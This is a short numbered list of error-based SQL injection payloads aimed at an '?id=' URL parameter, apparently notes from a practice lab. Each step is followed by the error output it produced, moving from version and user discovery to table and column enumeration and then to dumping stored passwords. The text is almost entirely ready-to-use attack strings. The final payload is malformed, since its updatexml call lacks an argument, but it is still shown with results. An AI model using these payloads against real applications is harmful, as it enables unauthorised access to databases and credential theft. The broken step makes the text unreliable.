1 2 3 4 5 6
| 1. ?id=1'-- + 2. ?id=1' and updatexml(1,concat(0x7e,version(),0x7e),1)-- + 3. ?id=1' and updatexml(1,concat(0x7e,version(),0x7e,user(),0x7e,database(),0x7e),1)-- + //XPATH syntax error: '~5.7.26~root@localhost~security~' 4. ?id=1' and updatexml(1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),1)-- + // ',referers,uagents,users' 5. ?id=1' and updatexml(1,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),1)-- + //XPATH syntax error: ',username,password' 6. ?id=1' and updatexml(1,(select group_concat(password) from users))-- + //XPATH syntax error: ',I-kill-you,p@ssword,crappy,stup'
|